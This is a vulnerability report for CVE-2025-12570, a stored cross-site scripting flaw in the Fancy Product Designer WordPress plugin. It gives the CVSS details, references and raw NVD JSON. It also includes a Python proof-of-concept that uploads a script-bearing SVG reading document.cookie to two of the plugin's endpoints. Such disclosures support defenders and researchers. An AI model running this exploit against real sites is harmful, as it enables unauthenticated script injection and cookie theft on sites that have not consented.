Security Vulnerability Report
CVE-2025-12570 (CVSS 7.2, HIGH)

Published: 2025-12-12 07:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping in the data-to-image.php and pdf-to-image.php files. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Fancy Product Designer WordPress plugin <= 6.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-12570 PoC - Fancy Product Designer SVG Upload Stored XSS
# Author: Security Researcher
# Note: This PoC is for educational and authorized testing purposes only

import requests
import sys

# Malicious SVG payload with XSS
XSS_PAYLOAD = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="300" height="200">
<script type="text/javascript">
alert('XSS - Cookie: ' + document.cookie);
</script>
<rect x="10" y="10" width="100" height="100" fill="red" />
<text x="50" y="50" fill="white">Pwned</text>
</svg>'''


def exploit_cve_2025_12570(target_url):
    """
    Exploit stored XSS via SVG upload in Fancy Product Designer
    """
    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-12570...")

    # Upload endpoint (typically in wp-content/uploads/)
    upload_url = f"{target_url}/wp-content/plugins/fancy-product-designer/inc/data-to-image.php"
    # Alternative endpoint
    alt_upload_url = f"{target_url}/wp-content/plugins/fancy-product-designer/inc/pdf-to-image.php"

    files = {
        'file': ('malicious.svg', XSS_PAYLOAD, 'image/svg+xml')
    }

    try:
        print(f"[+] Attempting upload to {upload_url}")
        response = requests.post(upload_url, files=files, timeout=10)
        if response.status_code == 200:
            print("[+] Upload successful!")
            print("[!] Access the uploaded SVG to trigger XSS")
            print(f"[!] URL: {response.url or upload_url}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url>")
        print(f"Example: python3 {sys.argv[0]} http://victim.com")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    exploit_cve_2025_12570(target)
```

References

- https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393
- https://www.wordfence.com/threat-intel/vulnerabilities/id/2db4eb1d-3a82-4f0f-b4ff-a291b0289b7f?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12570",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T07:15:42.980",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping in the data-to-image.php and pdf-to-image.php files. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2db4eb1d-3a82-4f0f-b4ff-a291b0289b7f?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```